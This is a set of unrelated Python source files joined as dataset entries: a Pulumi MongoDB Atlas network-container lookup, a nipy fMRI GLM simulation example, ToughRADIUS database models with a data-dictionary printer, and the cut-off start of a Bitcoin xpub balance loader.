CIDR block that Atlas uses for your clusters. Atlas uses the specified CIDR block for all other Network Peering connections created in the project. The Atlas CIDR block must be at least a /24 and at most a /21 in one of the following [private networks](https://tools.ietf.org/html/rfc1918.html#section-3).
"""
if azure_subscription_id and not isinstance(azure_subscription_id, str):
raise TypeError("Expected argument 'azure_subscription_id' to be a str")
__self__.azure_subscription_id = azure_subscription_id
"""
Unique identifer of the Azure subscription in which the VNet resides.
"""
if container_id and not isinstance(container_id, str):
raise TypeError("Expected argument 'container_id' to be a str")
__self__.container_id = container_id
if gcp_project_id and not isinstance(gcp_project_id, str):
raise TypeError("Expected argument 'gcp_project_id' to be a str")
__self__.gcp_project_id = gcp_project_id
"""
Unique identifier of the GCP project in which the Network Peering connection resides.
"""
if network_name and not isinstance(network_name, str):
raise TypeError("Expected argument 'network_name' to be a str")
__self__.network_name = network_name
"""
Name of the Network Peering connection in the Atlas project.
"""
if project_id and not isinstance(project_id, str):
raise TypeError("Expected argument 'project_id' to be a str")
__self__.project_id = project_id
if provider_name and not isinstance(provider_name, str):
raise TypeError("Expected argument 'provider_name' to be a str")
__self__.provider_name = provider_name
"""
Cloud provider for this Network Peering connection. If omitted, Atlas sets this parameter to AWS.
"""
if provisioned and not isinstance(provisioned, bool):
raise TypeError("Expected argument 'provisioned' to be a bool")
__self__.provisioned = provisioned
"""
Indicates whether the project has Network Peering connections deployed in the container.
"""
if region and not isinstance(region, str):
raise TypeError("Expected argument 'region' to be a str")
__self__.region = region
"""
Azure region where the container resides.
"""
if region_name and not isinstance(region_name, str):
raise TypeError("Expected argument 'region_name' to be a str")
__self__.region_name = region_name
"""
AWS region.
"""
if vnet_name and not isinstance(vnet_name, str):
raise TypeError("Expected argument 'vnet_name' to be a str")
__self__.vnet_name = vnet_name
"""
The name of the Azure VNet. This value is null until you provision an Azure VNet in the container.
"""
if vpc_id and not isinstance(vpc_id, str):
raise TypeError("Expected argument 'vpc_id' to be a str")
__self__.vpc_id = vpc_id
"""
Unique identifier of the project’s VPC.
"""
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
__self__.id = id
"""
id is the provider-assigned unique ID for this managed resource.
"""
class AwaitableGetNetworkContainerResult(GetNetworkContainerResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkContainerResult(
atlas_cidr_block=self.atlas_cidr_block,
azure_subscription_id=self.azure_subscription_id,
container_id=self.container_id,
gcp_project_id=self.gcp_project_id,
network_name=self.network_name,
project_id=self.project_id,
provider_name=self.provider_name,
provisioned=self.provisioned,
region=self.region,
region_name=self.region_name,
vnet_name=self.vnet_name,
vpc_id=self.vpc_id,
id=self.id)
def get_network_container(container_id=None,project_id=None,opts=None):
"""
`.NetworkContainer` describes a Network Peering Container. The resource requires your Project ID and container ID.
> **IMPORTANT:** This resource creates one Network Peering container into which Atlas can deploy Network Peering connections. An Atlas project can have a maximum of one container for each cloud provider. You must have either the Project Owner or Organization Owner role to successfully call this endpoint.
> **NOTE:** Groups and projects are synonymous terms. You may find **group_id** in the official documentation.
:param str container_id: The Network Peering Container ID.
:param str project_id: The unique ID for the project to create the database user.
> This content is derived from https://github.com/terraform-providers/terraform-provider-mongodbatlas/blob/master/website/docs/d/network_container.html.markdown.
"""
__args__ = dict()
__args__['containerId'] = container_id
__args__['projectId'] = project_id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = utilities.get_version()
__ret__ = pulumi.runtime.invoke('mongodbatlas:index/getNetworkContainer:getNetworkContainer', __args__, opts=opts).value
return AwaitableGetNetworkContainerResult(
atlas_cidr_block=__ret__.get('atlasCidrBlock'),
azure_subscription_id=__ret__.get('azureSubscriptionId'),
container_id=__ret__.get('containerId'),
gcp_project_id=__ret__.get('gcpProjectId'),
network_name=__ret__.get('networkName'),
project_id=__ret__.get('projectId'),
provider_name=__ret__.get('providerName'),
provisioned=__ret__.get('provisioned'),
region=__ret__.get('region'),
region_name=__ret__.get('regionName'),
vnet_name=__ret__.get('vnetName'),
vpc_id=__ret__.get('vpcId'),
id=__ret__.get('id'))
| StarcoderdataPython |
4826743 | #!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
This is an example where:
1. An sequence of fMRI volumes are simulated
2. A design matrix describing all the effects related to the data is computed
3. A GLM is applied to all voxels
4. A contrast image is created
Requires matplotlib
Author : <NAME>, 2010
"""
print __doc__
import os
import os.path as op
import numpy as np
try:
import matplotlib.pyplot as plt
except ImportError:
raise RuntimeError("This script needs the matplotlib library")
from nibabel import save, Nifti1Image
import nipy.modalities.fmri.design_matrix as dm
from nipy.labs.utils.simul_multisubject_fmri_dataset import \
surrogate_4d_dataset
from nipy.modalities.fmri.glm import GeneralLinearModel
from nipy.modalities.fmri.experimental_paradigm import EventRelatedParadigm
#######################################
# Simulation parameters
#######################################
# volume mask
shape = (20, 20, 20)
affine = np.eye(4)
# Acquisition parameters: number of scans (n_scans) and volume repetition time
# value in seconds
n_scans = 128
tr = 2.4
# input paradigm information
frametimes = np.linspace(0, (n_scans - 1) * tr, n_scans)
# conditions are 0 1 0 1 0 1 ...
conditions = np.arange(20) % 2
# 20 onsets (in sec), first event 10 sec after the start of the first scan
onsets = np.linspace(5, (n_scans - 1) * tr - 10, 20)
# model with canonical HRF (could also be :
# 'canonical with derivative' or 'fir'
hrf_model = 'canonical'
# fake motion parameters to be included in the model
motion = np.cumsum(np.random.randn(n_scans, 6), 0)
add_reg_names = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz']
########################################
# Design matrix
########################################
paradigm = EventRelatedParadigm(conditions, onsets)
X, names = dm.dmtx_light(frametimes, paradigm, drift_model='cosine',
hfcut=128, hrf_model=hrf_model, add_regs=motion,
add_reg_names=add_reg_names)
#######################################
# Get the FMRI data
#######################################
fmri_data = surrogate_4d_dataset(shape=shape, n_scans=n_scans)[0]
# if you want to save it as an image
data_file = 'fmri_data.nii'
save(fmri_data, data_file)
########################################
# Perform a GLM analysis
########################################
# GLM fit
Y = fmri_data.get_data().reshape(np.prod(shape), n_scans)
glm = GeneralLinearModel(X)
glm.fit(Y.T)
# specify the contrast [1 -1 0 ..]
contrast = np.zeros(X.shape[1])
contrast[0] = 1
contrast[1] = - 1
# compute the constrast image related to it
zvals = glm.contrast(contrast).z_score()
contrast_image = Nifti1Image(np.reshape(zvals, shape), affine)
# if you want to save the contrast as an image
contrast_path = 'zmap.nii'
save(contrast_image, contrast_path)
print ('Wrote the some of the results as images in directory %s' %
op.abspath(os.getcwd()))
h, c = np.histogram(zvals, 100)
# Show the histogram
plt.figure()
plt.bar(c[: - 1], h, width=.1)
plt.title(' Histogram of the z-values')
plt.show()
| StarcoderdataPython |
55569 | <filename>toughradius/manage/models.py<gh_stars>1-10
#!/usr/bin/env python
#coding:utf-8
import sqlalchemy
import warnings
warnings.simplefilter('ignore', sqlalchemy.exc.SAWarning)
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relation
from sqlalchemy.orm import scoped_session, sessionmaker
from hashlib import md5
from toughlib import utils
import functools
DeclarativeBase = declarative_base()
def get_metadata(db_engine):
global DeclarativeBase
metadata = DeclarativeBase.metadata
metadata.bind = db_engine
return metadata
class SystemSession(DeclarativeBase):
"""session表"""
__tablename__ = 'system_session'
__table_args__ = {
'mysql_engine' : 'MEMORY'
}
key = Column(u'_key', Unicode(length=512), primary_key=True, nullable=False,doc=u"session key")
value = Column(u'_value', Unicode(length=2048), nullable=False,doc=u"session value")
time = Column(u'_time', INTEGER(), nullable=False,doc=u"session timeout")
class SystemCache(DeclarativeBase):
"""cache表"""
__tablename__ = 'system_cache'
__table_args__ = {
'mysql_engine' : 'MEMORY'
}
key = Column(u'_key', Unicode(length=512), primary_key=True, nullable=False,doc=u"cache key")
value = Column(u'_value', Unicode(length=8192), nullable=False,doc=u"cache value")
time = Column(u'_time', INTEGER(), nullable=False,doc=u"cache timeout")
class TrNode(DeclarativeBase):
"""区域表"""
__tablename__ = 'tr_node'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"区域编号")
node_name = Column(u'node_name', Unicode(length=32), nullable=False,doc=u"区域名")
node_desc = Column(u'node_desc', Unicode(length=64), nullable=False,doc=u"区域描述")
class TrOperator(DeclarativeBase):
"""操作员表 操作员类型 0 系统管理员 1 普通操作员"""
__tablename__ = 'tr_operator'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"操作员id")
operator_type = Column('operator_type', INTEGER(), nullable=False,doc=u"操作员类型")
operator_name = Column(u'operator_name', Unicode(32), nullable=False,doc=u"操作员名称")
operator_pass = Column(u'operator_pass', Unicode(length=128), nullable=False,doc=u"操作员密码")
operator_status = Column(u'operator_status', INTEGER(), nullable=False,doc=u"操作员状态,0/1")
operator_desc = Column(u'operator_desc', Unicode(255), nullable=False,doc=u"操作员描述")
class TrOperatorNodes(DeclarativeBase):
"""操作员表关联区域"""
__tablename__ = 'tr_operator_nodes'
__table_args__ = {}
operator_name = Column(u'operator_name', Unicode(32),primary_key=True,nullable=False,doc=u"操作员名称")
node_name = Column(u'node_name', Unicode(32), primary_key=True,nullable=False,doc=u"区域名称")
class TrOperatorProducts(DeclarativeBase):
"""操作员表关联产品"""
__tablename__ = 'tr_operator_products'
__table_args__ = {}
# column definitions
operator_name = Column(u'operator_name', Unicode(32), primary_key=True, nullable=False, doc=u"操作员名称")
product_id = Column(u'product_id', Unicode(32), primary_key=True, nullable=False, doc=u"资费ID")
class TrOperatorRule(DeclarativeBase):
"""操作员权限表"""
__tablename__ = 'tr_operator_rule'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"权限id")
operator_name = Column(u'operator_name', Unicode(32), nullable=False,doc=u"操作员名称")
rule_path = Column(u'rule_path', Unicode(128), nullable=False,doc=u"权限URL")
rule_name = Column(u'rule_name', Unicode(128), nullable=False,doc=u"权限名称")
rule_category = Column(u'rule_category', Unicode(128), nullable=False,doc=u"权限分类")
class TrParam(DeclarativeBase):
"""系统参数表 """
__tablename__ = 'tr_param'
__table_args__ = {}
param_name = Column(u'param_name', Unicode(length=64), primary_key=True, nullable=False,doc=u"参数名")
param_value = Column(u'param_value', Unicode(length=1024), nullable=False,doc=u"参数值")
param_desc = Column(u'param_desc', Unicode(length=255),doc=u"参数描述")
class TrBas(DeclarativeBase):
"""BAS设备表"""
__tablename__ = 'tr_bas'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"设备id")
dns_name = Column(u'dns_name', Unicode(length=128), nullable=True, doc=u"DNS名称")
vendor_id = Column(u'vendor_id', Unicode(length=32), nullable=False,doc=u"厂商标识")
ip_addr = Column(u'ip_addr', Unicode(length=15), nullable=True,doc=u"IP地址")
bas_name = Column(u'bas_name', Unicode(length=64), nullable=False,doc=u"bas名称")
bas_secret = Column(u'bas_secret', Unicode(length=64), nullable=False,doc=u"共享密钥")
coa_port = Column(u'coa_port', INTEGER(), nullable=False,doc=u"CoA端口")
time_type = Column(u'time_type', SMALLINT(), nullable=False,doc=u"时区类型")
class TrBasNode(DeclarativeBase):
"""BAS设备关联区域"""
__tablename__ = 'tr_bas_node'
__table_args__ = {}
bas_id = Column(u'bas_id', INTEGER(), primary_key=True, nullable=False,doc=u"设备id")
node_id = Column(u'node_id', INTEGER(), primary_key=True, nullable=False,doc=u"区域id")
class TrRoster(DeclarativeBase):
"""黑白名单 0 白名单 1 黑名单"""
__tablename__ = 'tr_roster'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"黑白名单id")
mac_addr = Column('mac_addr', Unicode(length=17), nullable=False,doc=u"mac地址")
begin_time = Column('begin_time', Unicode(length=19), nullable=False,doc=u"生效开始时间")
end_time = Column('end_time', Unicode(length=19), nullable=False,doc=u"生效结束时间")
roster_type = Column('roster_type', SMALLINT(), nullable=False,doc=u"黑白名单类型")
class TrCustomer(DeclarativeBase):
"""用户信息表"""
__tablename__ = 'tr_customer'
__table_args__ = {}
customer_id = Column('customer_id', INTEGER(),
Sequence('customer_id_seq', start=100001, increment=1),
primary_key=True,nullable=False,doc=u"用户id")
node_id = Column('node_id', INTEGER(), nullable=False,doc=u"区域id")
customer_name = Column('customer_name', Unicode(length=64), nullable=False,doc=u"用户登录名")
password = Column('password', Unicode(length=128), nullable=False,doc=u"用户登录密码")
realname = Column('realname', Unicode(length=64), nullable=False,doc=u"")
idcard = Column('idcard', Unicode(length=32),doc=u"用户证件号码")
sex = Column('sex', SMALLINT(), nullable=True,doc=u"用户性别0/1")
age = Column('age', INTEGER(), nullable=True,doc=u"用户年龄")
email = Column('email', Unicode(length=255), nullable=True,doc=u"用户邮箱")
email_active = Column('email_active', SMALLINT(), default=0,doc=u"用户邮箱激活状态")
active_code = Column('active_code', Unicode(length=32), nullable=False,doc=u"邮箱激活码")
mobile = Column('mobile', Unicode(length=16), nullable=True,doc=u"用户手机")
mobile_active = Column('mobile_active', SMALLINT(), default=0,doc=u"用户手机绑定状态")
address = Column('address', Unicode(length=255), nullable=True,doc=u"用户地址")
customer_desc = Column(u'customer_desc', Unicode(255),doc=u"用户描述")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"创建时间")
update_time = Column('update_time', Unicode(length=19), nullable=False,doc=u"更新时间")
class TrCustomerOrder(DeclarativeBase):
"""
订购信息表(交易记录)
pay_status交易支付状态:0-未支付,1-已支付,2-已取消
"""
__tablename__ = 'tr_customer_order'
__table_args__ = {}
order_id = Column('order_id', Unicode(length=32),primary_key=True,nullable=False,doc=u"订单id")
customer_id = Column('customer_id', INTEGER(),nullable=False,doc=u"用户id")
product_id = Column('product_id', INTEGER(),nullable=False,doc=u"资费id")
account_number = Column('account_number', Unicode(length=32),nullable=False,doc=u"上网账号")
order_fee = Column('order_fee', INTEGER(), nullable=False,doc=u"订单费用")
actual_fee = Column('actual_fee', INTEGER(), nullable=False,doc=u"实缴费用")
pay_status = Column('pay_status', INTEGER(), nullable=False,doc=u"支付状态")
accept_id = Column('accept_id', INTEGER(),nullable=False,doc=u"受理id")
order_source = Column('order_source', Unicode(length=64), nullable=False,doc=u"订单来源")
order_desc = Column('order_desc', Unicode(length=255),doc=u"订单描述")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"交易时间")
class TrAccount(DeclarativeBase):
"""
上网账号表,每个会员可以同时拥有多个上网账号
account_number 为每个套餐对应的上网账号,每个上网账号全局唯一
用户状态 0:"预定",1:"正常", 2:"停机" , 3:"销户", 4:"到期"
"""
__tablename__ = 'tr_account'
__table_args__ = {}
account_number = Column('account_number', Unicode(length=32),primary_key=True,nullable=False,doc=u"上网账号")
customer_id = Column('customer_id', INTEGER(),nullable=False,doc=u"用户id")
client_id = Column('client_id', INTEGER(),nullable=False,doc=u"客户id")
product_id = Column('product_id', INTEGER(),nullable=False,doc=u"资费id")
group_id = Column('group_id', INTEGER(),doc=u"用户组id")
password = Column('password', Unicode(length=128), nullable=False,doc=u"上网密码")
status = Column('status', INTEGER(), nullable=False,doc=u"用户状态")
install_address = Column('install_address', Unicode(length=128), nullable=False,doc=u"装机地址")
balance = Column('balance', INTEGER(), nullable=False, default=0, doc=u"用户余额-分")
time_length = Column('time_length', INTEGER(), nullable=False,default=0,doc=u"用户时长-秒")
flow_length = Column('flow_length', INTEGER(), nullable=False,default=0,doc=u"用户流量-kb")
expire_date = Column('expire_date', Unicode(length=10), nullable=False,doc=u"过期时间- ####-##-##")
user_concur_number = Column('user_concur_number', INTEGER(), nullable=False,doc=u"用户并发数")
bind_mac = Column('bind_mac', SMALLINT(), nullable=False,doc=u"是否绑定mac")
bind_vlan = Column('bind_vlan', SMALLINT(), nullable=False,doc=u"是否绑定vlan")
mac_addr = Column('mac_addr', Unicode(length=17),doc=u"mac地址")
vlan_id1 = Column('vlan_id1', INTEGER(),doc=u"内层vlan")
vlan_id2 = Column('vlan_id2', INTEGER(),doc=u"外层vlan")
ip_address = Column('ip_address', Unicode(length=15),doc=u"静态IP地址")
last_pause = Column('last_pause', Unicode(length=19),doc=u"最后停机时间")
account_desc = Column(u'account_desc', Unicode(255),doc=u"用户描述")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"创建时间")
update_time = Column('update_time', Unicode(length=19), nullable=False,doc=u"更新时间")
class TrAccountAttr(DeclarativeBase):
"""上网账号扩展策略属性表"""
__tablename__ = 'tr_account_attr'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"属性id")
account_number = Column('account_number', Unicode(length=32),nullable=False,doc=u"上网账号")
attr_type = Column('attr_type', INTEGER(), default=1, doc=u"属性类型,0,一般;1,radius属性")
attr_name = Column(u'attr_name', Unicode(length=255), nullable=False,doc=u"属性名")
attr_value = Column(u'attr_value', Unicode(length=255), nullable=False,doc=u"属性值")
attr_desc = Column(u'attr_desc', Unicode(length=255),doc=u"属性描述")
UniqueConstraint('account_number','attr_name','attr_type',name='tr_account_attr_idx')
class TrProduct(DeclarativeBase):
'''
资费信息表
资费类型 product_policy 0 预付费包月 1 预付费时长 2 买断包月 3 买断时长 4 预付费流量 5 买断流量 6 自由资费
销售状态 product_status 0 正常 1 停用 资费停用后不允许再订购
'''
__tablename__ = 'tr_product'
__table_args__ = {}
id = Column('id', INTEGER(),primary_key=True,autoincrement=1,nullable=False,doc=u"资费id")
product_name = Column('product_name', Unicode(length=64), nullable=False,doc=u"资费名称")
product_policy = Column('product_policy', INTEGER(), nullable=False,doc=u"资费策略")
product_status = Column('product_status', SMALLINT(), nullable=False,doc=u"资费状态")
bind_mac = Column('bind_mac', SMALLINT(), nullable=False,doc=u"是否绑定mac")
bind_vlan = Column('bind_vlan', SMALLINT(), nullable=False,doc=u"是否绑定vlan")
concur_number = Column('concur_number', INTEGER(), nullable=False,doc=u"并发数")
fee_period = Column('fee_period', Unicode(length=11),doc=u"开放认证时段")
fee_months = Column('fee_months', INTEGER(),doc=u"买断授权月数")
fee_times = Column('fee_times', INTEGER(),doc=u"买断时长(秒)")
fee_flows = Column('fee_flows', INTEGER(),doc=u"买断流量(kb)")
fee_price = Column('fee_price', INTEGER(),nullable=False,doc=u"资费价格")
fee_period = Column('fee_period', Unicode(length=11),doc=u"计费认证时段")
input_max_limit = Column('input_max_limit', INTEGER(), nullable=False,doc=u"上行速率")
output_max_limit = Column('output_max_limit', INTEGER(), nullable=False,doc=u"下行速率")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"创建时间")
update_time = Column('update_time', Unicode(length=19), nullable=False,doc=u"更新时间")
class TrProductAttr(DeclarativeBase):
'''资费扩展属性表'''
__tablename__ = 'tr_product_attr'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"属性id")
product_id = Column('product_id', INTEGER(),nullable=False,doc=u"资费id")
attr_type = Column('attr_type', INTEGER(), default=1, doc=u"属性类型,0,一般;1,radius属性")
attr_name = Column(u'attr_name', Unicode(length=255), nullable=False,doc=u"属性名")
attr_value = Column(u'attr_value', Unicode(length=255), nullable=False,doc=u"属性值")
attr_desc = Column(u'attr_desc', Unicode(length=255),doc=u"属性描述")
UniqueConstraint('product_id','attr_type',name='tr_product_attr_idx')
class TrBilling(DeclarativeBase):
"""计费信息表 is_deduct 0 未扣费 1 已扣费"""
__tablename__ = 'tr_billing'
__table_args__ = { }
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"计费id")
account_number = Column(u'account_number', Unicode(length=253), nullable=False,doc=u"上网账号")
nas_addr = Column(u'nas_addr', Unicode(length=15), nullable=False,doc=u"bas地址")
acct_session_id = Column(u'acct_session_id', Unicode(length=253), nullable=False,doc=u"会话id")
acct_start_time = Column(u'acct_start_time', Unicode(length=19), nullable=False,doc=u"计费开始时间")
acct_session_time = Column(u'acct_session_time', INTEGER(), nullable=False,doc=u"会话时长")
input_total = Column(u'input_total', INTEGER(),doc=u"会话的上行流量(kb)")
output_total = Column(u'output_total', INTEGER(),doc=u"会话的下行流量(kb)")
acct_times = Column(u'acct_times', INTEGER(), nullable=False,doc=u"扣费时长(秒)")
acct_flows = Column(u'acct_flows', INTEGER(), nullable=False,doc=u"扣费流量(kb)")
acct_fee = Column(u'acct_fee', INTEGER(), nullable=False,doc=u"应扣费用")
actual_fee = Column('actual_fee', INTEGER(), nullable=False,doc=u"实扣费用")
balance = Column('balance', INTEGER(), nullable=False,doc=u"当前余额")
time_length = Column('time_length', INTEGER(), nullable=False,default=0,doc=u"当前用户时长-秒")
flow_length = Column('flow_length', INTEGER(), nullable=False,default=0,doc=u"当前用户流量-kb")
is_deduct = Column(u'is_deduct', INTEGER(), nullable=False,doc=u"是否扣费")
create_time = Column('create_time', Unicode(length=19), nullable=False,doc=u"计费时间")
class TrTicket(DeclarativeBase):
"""上网日志表"""
__tablename__ = 'tr_ticket'
__table_args__ = { }
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"日志id")
account_number = Column(u'account_number', Unicode(length=253), nullable=False,doc=u"上网账号")
acct_input_gigawords = Column(u'acct_input_gigawords', INTEGER(),doc=u"会话的上行的字(4字节)的吉倍数")
acct_output_gigawords = Column(u'acct_output_gigawords', INTEGER(),doc=u"会话的下行的字(4字节)的吉倍数")
acct_input_octets = Column(u'acct_input_octets', INTEGER(),doc=u"会话的上行流量(字节数)")
acct_output_octets = Column(u'acct_output_octets', INTEGER(),doc=u"会话的下行流量(字节数)")
acct_input_packets = Column(u'acct_input_packets', INTEGER(),doc=u"会话的上行包数量")
acct_output_packets = Column(u'acct_output_packets', INTEGER(),doc=u"会话的下行包数量")
acct_session_id = Column(u'acct_session_id', Unicode(length=253), nullable=False,doc=u"会话id")
acct_session_time = Column(u'acct_session_time', INTEGER(), nullable=False,doc=u"会话时长")
acct_start_time = Column(u'acct_start_time', Unicode(length=19), nullable=False,doc=u"会话开始时间")
acct_stop_time = Column(u'acct_stop_time', Unicode(length=19), nullable=False,doc=u"会话结束时间")
acct_terminate_cause = Column(u'acct_terminate_cause',INTEGER(),doc=u"会话中止原因")
mac_addr = Column(u'mac_addr', Unicode(length=128),doc=u"mac地址")
calling_station_id = Column(u'calling_station_id', Unicode(length=128),doc=u"用户接入物理信息")
framed_netmask = Column(u'framed_netmask', Unicode(length=15),doc=u"地址掩码")
framed_ipaddr = Column(u'framed_ipaddr', Unicode(length=15),doc=u"IP地址")
nas_class = Column(u'nas_class', Unicode(length=253),doc=u"bas class")
nas_addr = Column(u'nas_addr', Unicode(length=15), nullable=False,doc=u"bas地址")
nas_port = Column(u'nas_port', Unicode(length=32),doc=u"接入端口")
nas_port_id = Column(u'nas_port_id', Unicode(length=255),doc=u"接入端口物理信息")
nas_port_type = Column(u'nas_port_type', INTEGER(),doc=u"接入端口类型")
service_type = Column(u'service_type', INTEGER(),doc=u"接入服务类型")
session_timeout = Column(u'session_timeout', INTEGER(),doc=u"会话超时时间")
start_source = Column(u'start_source', INTEGER(), nullable=False,doc=u"会话开始来源")
stop_source = Column(u'stop_source', INTEGER(), nullable=False,doc=u"会话中止来源")
class TrOnline(DeclarativeBase):
"""用户在线信息表"""
__tablename__ = 'tr_online'
__table_args__ = {
'mysql_engine' : 'MEMORY'
}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"在线id")
account_number = Column(u'account_number', Unicode(length=32), nullable=False, index=True, doc=u"上网账号")
nas_addr = Column(u'nas_addr', Unicode(length=32), nullable=False,index=True, doc=u"bas地址")
acct_session_id = Column(u'acct_session_id', Unicode(length=64),index=True, nullable=False,doc=u"会话id")
acct_start_time = Column(u'acct_start_time', Unicode(length=19), nullable=False,doc=u"会话开始时间")
framed_ipaddr = Column(u'framed_ipaddr', Unicode(length=32), nullable=False,doc=u"IP地址")
mac_addr = Column(u'mac_addr', Unicode(length=32), nullable=False,doc=u"mac地址")
nas_port_id = Column(u'nas_port_id', Unicode(length=255), nullable=False,doc=u"接入端口物理信息")
billing_times = Column(u'billing_times', INTEGER(), nullable=False,doc=u"已记账时间")
input_total = Column(u'input_total', INTEGER(),doc=u"上行流量(kb)")
output_total = Column(u'output_total', INTEGER(),doc=u"下行流量(kb)")
start_source = Column(u'start_source', SMALLINT(), nullable=False,doc=u"记账开始来源")
UniqueConstraint('nas_addr', 'acct_session_id', name='unique_nas_session')
class TrAcceptLog(DeclarativeBase):
'''
业务受理日志表
open:开户 pause:停机 resume:复机 cancel:销户 next:续费 charge:充值
'''
__tablename__ = 'tr_accept_log'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"日志id")
accept_type = Column(u'accept_type', Unicode(length=16), nullable=False,doc=u"受理类型")
accept_desc = Column(u'accept_desc', Unicode(length=512),doc=u"受理描述")
account_number = Column(u'account_number', Unicode(length=32), nullable=False,doc=u"上网账号")
operator_name = Column(u'operator_name', Unicode(32),doc=u"操作员名")
accept_source = Column(u'accept_source', Unicode(length=128),doc=u"受理渠道来源")
accept_time = Column(u'accept_time', Unicode(length=19), nullable=False,doc=u"受理时间")
class TrOperateLog(DeclarativeBase):
"""操作日志表"""
__tablename__ = 'tr_operate_log'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"日志id")
operator_name = Column(u'operator_name', Unicode(32), nullable=False,doc=u"操作员名称")
operate_ip = Column(u'operate_ip', Unicode(length=128),doc=u"操作员ip")
operate_time = Column(u'operate_time', Unicode(length=19), nullable=False,doc=u"操作时间")
operate_desc = Column(u'operate_desc', Unicode(length=1024),doc=u"操作描述")
###############################################################################
# 统计数据模型 ####
###############################################################################
class TrOnlineStat(DeclarativeBase):
"""用户在线统计表 """
__tablename__ = 'tr_online_stat'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"id")
node_id = Column('node_id', INTEGER(),nullable=False,doc=u"区域id")
stat_time = Column(u'stat_time', INTEGER(), nullable=False,doc=u"统计时间")
total = Column(u'total', INTEGER(),doc=u"在线数")
class TrFlowStat(DeclarativeBase):
"""用户在线统计表 """
__tablename__ = 'tr_flow_stat'
__table_args__ = {}
id = Column(u'id', INTEGER(), primary_key=True, nullable=False,doc=u"id")
node_id = Column('node_id', INTEGER(),nullable=False,doc=u"区域id")
stat_time = Column(u'stat_time', INTEGER(), nullable=False,doc=u"统计时间")
input_total = Column(u'input_total', INTEGER(),doc=u"上行流量(kb)")
output_total = Column(u'output_total', INTEGER(),doc=u"下行流量(kb)")
class TrUserStat(DeclarativeBase):
"""28. 用户发展统计"""
__tablename__ = 'tr_user_stat'
__table_args__ = {}
node_id = Column(u'node_id', INTEGER(), primary_key=True, nullable=False,doc=u"区域编号")
stat_day = Column(u'stat_day', Unicode(length=10),primary_key=True,nullable=False,doc=u"统计日期")
open_count = Column(u'open_count', INTEGER(), nullable=False,doc=u"新开数")
pause_count = Column(u'pause_count', INTEGER(), nullable=False,doc=u"停机数")
resume_count = Column(u'resume_count', INTEGER(), nullable=False,doc=u"复机数")
cancel_count = Column(u'cancel_count', INTEGER(), nullable=False,doc=u"销户数")
next_count = Column(u'next_count', INTEGER(), nullable=False,doc=u"续费数")
valid_count = Column(u'valid_count', INTEGER(), nullable=False,doc=u"在网数")
class TrProductStat(DeclarativeBase):
"""29. 资费统计表"""
__tablename__ = 'tr_product_stat'
__table_args__ = {}
node_id = Column(u'node_id', INTEGER(), primary_key=True,nullable=False,doc=u"区域编号")
stat_day = Column(u'stat_day', Unicode(length=10),primary_key=True,nullable=False,doc=u"统计日期")
product_id = Column('product_id', INTEGER(),primary_key=True,nullable=False,doc=u"资费id")
count = Column(u'count', INTEGER(),nullable=False,doc=u"服务订购数")
class TrFeeStat(DeclarativeBase):
"""30. 费用统计表"""
__tablename__ = 'tr_fee_stat'
__table_args__ = {}
node_id = Column(u'node_id', INTEGER(), primary_key=True,nullable=False,doc=u"区域编号")
stat_day = Column(u'stat_day', Unicode(length=10),primary_key=True,nullable=False,doc=u"统计日期")
income_fee = Column(u'income_fee', INTEGER(),nullable=False,doc=u"收入")
refund_fee = Column(u'refund_fee', INTEGER(),nullable=False,doc=u"退费")
def print_header():
print "|%s|%s|%s|%s|"%("属性".ljust(26,' '),"类型(长度)".ljust(25,' '),"可否为空".ljust(23,' '),'描述'.ljust(30,' '))
print "|%s|:%s|:%s:|%s:|"%("-"*23,"-"*17,"-"*16,"-"*26)
def print_model(tmdl):
print "##", tmdl.__tablename__
print
if tmdl.__doc__ :
print tmdl.__doc__
print
pk = ",".join( c.name for c in tmdl.__table__.primary_key.columns)
print_header()
for c in tmdl.__table__.columns:
# print c.name,c.type,c.nullable
_name = str(c.name).ljust(21," ")
_type = str(c.type).ljust(16," ")
_null = str(c.nullable).ljust(16," ")
_doc = str((c.doc or '').encode("utf-8")).ljust(30,' ')
print "|%s |%s |%s |%s|"%(_name,_type,_null,_doc)
# print_end()
mdls = [
TrProduct,
TrCustomer,
TrAccount,
TrBas,
TrNode
]
if __name__ == '__main__':
print "# ToughRADIUS数据字典\n\n"
for mdl in mdls:
print_model(mdl)
print
| StarcoderdataPython |
3328820 | <filename>app/accounts/btc_xpub.py
import requests
from btcpy.setup import setup
from btcpy.structs.hd import ExtendedPublicKey
from btcpy.structs.address import P2shAddress, P2wpkhAddress
from .. import Account
setup('mainnet')
# TO DO:
# Separate addresses into different balances (name each, e.g. 'change0, spend1')
# Alternatives for address='nested'
class btc_xpub(Account):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.xpub = ExtendedPublicKey.decode(self.address)
def load_balance(self):
bal = 0
for change in [0, 1]:
used = True
i = 0
while True:
pk = derive_key(self.xpub, change, index=i)
i += 1
